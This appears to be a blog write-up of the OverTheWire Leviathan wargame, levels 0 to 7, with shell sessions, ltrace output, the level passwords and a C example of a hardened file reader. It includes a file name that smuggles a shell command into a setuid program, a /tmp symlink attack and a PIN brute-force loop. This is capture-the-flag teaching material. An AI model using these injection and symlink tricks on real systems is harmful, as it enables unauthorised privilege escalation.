It’s been a while since I’ve had a decent post. Life happened and I’ve started the transition into a new job with an awesome company. I wanted to post something though, even if it’s going to be a short one.

I’m going to start with some write-ups of the OverTheWire wargames, starting with Leviathan. If you haven’t done any of these yet, I suggest you do. I also suggest that, if you are new to the whole Linux thing, you start with Bandit, as it is a great primer.

So. Let’s do this!

Leviathan 0 -> 1

So, first thing we see is a .backup directory containing a bookmarks.html file.

leviathan0@melinda:~$ ls -al
total 24
drwxr-xr-x   3 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Aug  8 23:10 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ cd .backup/
leviathan0@melinda:~/.backup$ ls -al
total 140
drwxr-x--- 2 leviathan1 leviathan0   4096 Aug  8 23:10 .
drwxr-xr-x 3 root       root         4096 Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 133259 Nov 14  2014 bookmarks.html

Checking the file for any passwords gives us the Leviathan1 password.

leviathan0@melinda:~/.backup$ cat bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for 
leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to 
leviathan1</A>

Leviathan 1 -> 2

This one is slightly more complicated. We have a check ELF that asks us for a password and then exits. Luckily ltrace is installed, so we can easily see that it’s looking for sex as the password.

leviathan1@melinda:~$ ls -al
total 28
drwxr-xr-x   2 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7493 Nov 14  2014 check
leviathan1@melinda:~$ ./check
password: pas
Wrong password, Good Bye ...
leviathan1@melinda:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7b4, 0x80485f0 <unfinished ...>
printf("password: ")                                                         = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: pas
)                                 = 112
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 97
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 115
strcmp("pas", "sex")                                                         = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                         = 29
+++ exited (status 0) +++
leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Leviathan 2 -> 3

I have a love/hate relationship with this one. It’s another ELF that prints the contents of whatever file you feed it assuming the current user has permissions. Problem is…I don’t have permissions to the file I want to print.

leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Using ltrace again, we can see it’s using access() to check if we have permissions and then calling cat on the file.

leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ltrace ~/printfile test
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("test", 4)                                                            = 0
snprintf("/bin/cat test", 511, "/bin/cat %s", "test")                        = 13
system("/bin/cat test" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 0
+++ exited (status 0) +++

I tried a few things using file names and confirmed the EUID is leviathan3. Another quick change to the file name and BAM! We got our password.

leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ touch test\;\ id
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ touch test\;\ bash
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ id
/bin/cat: test: Permission denied
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile test;\;\ bash
/bin/cat: test: Permission denied
-bash: ; bash: command not found
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ bash
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ exit
exit
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ touch test\;\ sh
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ sh
/bin/cat: test: Permission denied
$ id
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
$ cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j

Leviathan 3 -> 4

This one is the same as level 2, just using ltrace to see the password.

leviathan3@melinda:~$ ./level3
Enter the password> pas
bzzzzzzzzap. WRONG
leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7b4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                   = -1
printf("Enter the password> ")                                               = 20
fgets(Enter the password> pass
"pass\n", 256, 0xf7fcac20)                                             = 0xffffd5ac
strcmp("pass\n", "snlprintf\n")                                              = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                                   = 19
+++ exited (status 0) +++
leviathan3@melinda:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

Leviathan 4 -> 5

Again, another easy one. An ELF hidden in a .trash directory that spat out some binary. Using Perl, I translated it back to ASCII and got our password for leviathan 5.

leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
leviathan4@melinda:~/.trash$ ./bin | perl -lape '$_=pack("(B8)*",@F'
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
leviathan4@melinda:~/.trash$ ./bin | perl -lape '$_=pack"(B8)*",@F'
Tith4cokei

Leviathan 5 -> 6

Tricky, but not too difficult. The ELF simply prints out the contents of file.log so I just created a symbolic link between file.log and our password file.

leviathan5@melinda:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                            = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan5@melinda:~$ touch /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0x804b008
fgetc(0x804b008)                                                             = '\377'
feof(0x804b008)                                                              = 1
fclose(0x804b008)                                                            = 0
getuid()                                                                     = 12005
setuid(12005)                                                                = 0
unlink("/tmp/file.log")                                                      = 0
+++ exited (status 0) +++
leviathan5@melinda:~$ echo test > /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
test
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log; ./leviathan5
UgaoFee4li
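
Leviathan 2 and Leviathan 5 fail the same way: a setuid program touches a caller-controlled path while still holding its owner's privileges, in level 2 through system() after the access() check, in level 5 through fopen() on a /tmp name before the setuid(getuid()) call seen in the trace. The block below is an added example, not the wargame's source (which the page does not show): it puts the level 2 command string next to a reader that switches to the real UID first, skips the shell, and refuses symlinks. build_shell_cmd, read_as_caller and the sample paths are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L /* O_NOFOLLOW, seteuid, symlink */
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Level 2 pattern from the ltrace output: the argument is pasted into a
 * shell command line. Built for inspection only, never executed here. */
int build_shell_cmd(char *cmd, size_t n, const char *arg) {
    return snprintf(cmd, n, "/bin/cat %s", arg);
}

/* Hardened reader (hypothetical): take the caller's real UID before open()
 * so the kernel checks the caller's own permissions; no shell, no symlink
 * as the final component, regular files only. Returns bytes read or -1. */
ssize_t read_as_caller(const char *path, char *buf, size_t n) {
    struct stat st;
    if (n == 0 || seteuid(getuid()) != 0)
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    ssize_t got = read(fd, buf, n - 1);
    close(fd);
    if (got >= 0)
        buf[got] = '\0';
    return got;
}

int main(void) {
    char cmd[512], buf[256];
    const char *name = "/tmp/test; id", *lnk = "/tmp/file.log.demo";
    FILE *f = fopen(name, "w");          /* constructed sample file */
    if (!f) return 1;
    fputs("hello\n", f);
    fclose(f);
    build_shell_cmd(cmd, sizeof cmd, name);
    printf("sh would run: %s\n", cmd);
    printf("direct read : %zd\n", read_as_caller(name, buf, sizeof buf));
    if (symlink(name, lnk) == 0)
        printf("via symlink : %zd\n", read_as_caller(lnk, buf, sizeof buf));
    unlink(lnk);
    unlink(name);
    return 0;
}
```

seteuid() leaves the saved set-user-ID in place; a program that never needs the owner's privileges again would drop them permanently with setresuid().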

Leviathan 6 -> 7

So we have an ELF that asks for a 4 digit pin, and ltrace didn’t help us.

leviathan6@melinda:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ./leviathan6 5555
Wrong
leviathan6@melinda:~$ ltrace ./leviathan6 6666
__libc_start_main(0x804850d, 2, 0xffffd7a4, 0x8048590 <unfinished ...>
atoi(0xffffd8d0, 0xffffd7a4, 0xffffd7b0, 0xf7e5619d)                         = 6666
puts("Wrong"Wrong
)                                                                = 6
+++ exited (status 6) +++

It’s only a 4 digit pin, so a little bash magic and we can brute force it.

for i in {0..9}{0..9}{0..9}{0..9}; do ./leviathan6 $i; done
...
Wrong
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Leviathan 7 -> 8

leviathan7@melinda:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.